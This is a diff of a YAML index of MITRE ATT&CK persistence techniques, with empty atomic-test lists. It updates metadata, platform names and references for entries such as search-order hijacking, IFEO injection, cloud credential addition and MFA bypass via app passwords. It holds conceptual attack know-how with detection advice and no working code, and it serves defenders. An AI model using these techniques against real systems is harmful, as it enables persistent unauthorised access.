         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30407,6 +30828,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30414,7 +30836,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30434,29 +30855,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -30533,12 +30956,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30553,6 +30975,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -30561,18 +30984,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -30604,9 +31027,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -30678,7 +31098,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -30705,7 +31124,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -30731,13 +31150,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -30858,7 +31275,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -30930,7 +31346,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -31000,7 +31415,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -31110,7 +31524,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -31164,7 +31577,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31197,8 +31610,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -31229,7 +31640,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31264,12 +31675,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31346,7 +31755,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31400,7 +31808,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31432,7 +31839,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31462,55 +31869,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -31541,6 +31903,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -31550,9 +31913,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -31560,11 +31927,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -31596,7 +31999,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31644,13 +32047,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31663,16 +32064,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -31684,16 +32085,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -31748,7 +32149,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -31809,7 +32209,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -31885,7 +32284,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -31913,8 +32312,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -31940,7 +32337,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31965,23 +32362,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -31991,11 +32386,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -32006,12 +32405,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -32020,6 +32426,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -32028,13 +32435,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -32060,10 +32470,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -32072,10 +32490,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32092,14 +32520,11 @@ persistence:
